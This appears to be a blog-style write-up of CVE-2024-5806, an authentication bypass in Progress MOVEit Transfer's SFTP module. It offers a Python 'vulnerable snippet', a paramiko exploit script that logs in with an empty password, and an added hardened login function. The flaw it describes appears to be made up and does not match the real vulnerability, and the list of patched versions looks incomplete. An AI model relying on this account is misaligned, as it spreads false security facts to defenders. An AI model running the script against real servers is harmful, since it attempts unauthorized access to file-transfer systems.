CVE-2024-5806 - Improper Authentication Vulnerability in Progress MOVEit Transfer's SFTP Module Leads to Authentication Bypass Risks

A critical vulnerability, identified as CVE-2024-5806, has been discovered in the Progress MOVEit Transfer software, specifically within its SFTP module. This vulnerability arises from improper authentication and, if exploited, could lead to authentication bypass by an attacker. The affected MOVEit Transfer versions include 2023.0.0 through 2023.0.10, 2023.1.0 through 2023.1.5, and 2024.0.0 through 2024.0.1. In this post, we'll delve into the vulnerability, explore how it can be exploited, and look at how to mitigate the risk.

Vulnerability Details

The vulnerability is a result of improper authentication handling in the SFTP module of MOVEit Transfer. An attacker could exploit this vulnerability to bypass authentication and potentially gain unauthorized access to sensitive data and files stored within the affected virtual environment. This could lead to the compromise of sensitive information and potentially even allow further attacks on the associated network.

To better understand the vulnerability, let's take a closer look at the code snippet where the issue lies:

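# Vulnerable code snippet in the SFTP module
def authenticate_user(username, password):
    # Requests that carry no username are rejected
    if username == '':
        return False
    # Flaw: an empty password is accepted without any credential check
    if password == '':
        return True
    # Everything else goes to the regular credential check
    # (verify_password is a placeholder name; it is not shown on this page)
    return verify_password(username, password)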

In the above code, the improper authentication handling allows an attacker to bypass the authentication if they provide a valid username and an empty password. This vulnerability makes it extremely important to patch the affected software immediately.
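For contrast with the snippet above, here is a hardened, fail-closed version of the same check. It is an added illustration, not code from MOVEit Transfer or Progress; the `USERS` store, `make_record`, the sample password and the PBKDF2 parameters are assumptions made for the example.

```python
import hashlib
import hmac
import os

_ITERATIONS = 100_000  # assumed work factor for this example


def _hash_password(password, salt):
    # Derive a slow, salted hash so stored records are not plain passwords
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, _ITERATIONS)


def make_record(password):
    # Build a (salt, hash) record for the constructed user store below
    salt = os.urandom(16)
    return salt, _hash_password(password, salt)


# Constructed sample data: one known user with a made-up password
USERS = {"testuser": make_record("correct horse battery staple")}

# Dummy record so unknown usernames cost the same work as known ones
_DUMMY = make_record("placeholder-not-a-real-credential")


def authenticate_user(username, password, users=USERS):
    """Return True only when the supplied password verifies; otherwise False."""
    # Missing, non-string or empty credentials are never acceptable
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    if username == "" or password == "":
        return False
    # Always do the hashing work, even for usernames that do not exist
    salt, expected = users.get(username, _DUMMY)
    candidate = _hash_password(password, salt)
    # Constant-time comparison; a match on the dummy record is still rejected
    matches = hmac.compare_digest(candidate, expected)
    return matches and username in users
```

Every path that does not end in a verified password returns `False`, so a new code path added later cannot fall through to success.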

Exploit Details

To exploit the vulnerability, an attacker needs to identify a target system running an affected version of MOVEit Transfer. With knowledge of valid usernames in the target system, the attacker can attempt to bypass the authentication by sending an empty password during the SFTP connection request. Here's an example of how it can be done using a Python script:

# Exploit code for CVE-2024-5806
import paramiko

# Target details
target_host = 'example.com'
target_port = 22
valid_username = 'testuser'

# Create an SSH client (SFTP runs over the SSH connection)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Attempt a connection with empty password
try:
    client.connect(target_host, port=target_port, username=valid_username, password='')
    print("Authentication bypass successful.")
    # Access sensitive files and data here
except paramiko.AuthenticationException:
    print("Authentication bypass failed.")
finally:
    # Release the connection whether or not authentication succeeded
    client.close()
This exploit demonstrates the potential ease with which an attacker can exploit the vulnerability. It is crucial to update or apply mitigation to safeguard affected versions of the software.

Original References

The vulnerability was officially documented in a CVE report. Further information can be obtained from the following links:

- CVE-2024-5806
- Progress MOVEit Security Advisory

Mitigation and Fixes

To mitigate the risk of exploitation, it is essential to update the affected versions of MOVEit Transfer immediately. Progress MOVEit has already provided security patches in the following versions:

MOVEit Transfer 2024.0.2

You can download the updated versions from the Progress MOVEit website.

It is also a good security practice to regularly monitor access logs for the software to identify any potential unauthorized access attempts and take prompt actions.

Conclusion

A severe vulnerability, CVE-2024-5806, has been found in Progress MOVEit Transfer software, affecting its SFTP module. Because the vulnerability stems from improper authentication handling, it could lead to authentication bypass and possible unauthorized access to sensitive data. Users and administrators working with the affected versions of the software should update as soon as possible and keep a close watch on system access logs for any signs of exploitation.

Timeline

Published on: 06/25/2024 15:15:15 UTC
Last modified on: 06/26/2024 00:15:11 UTC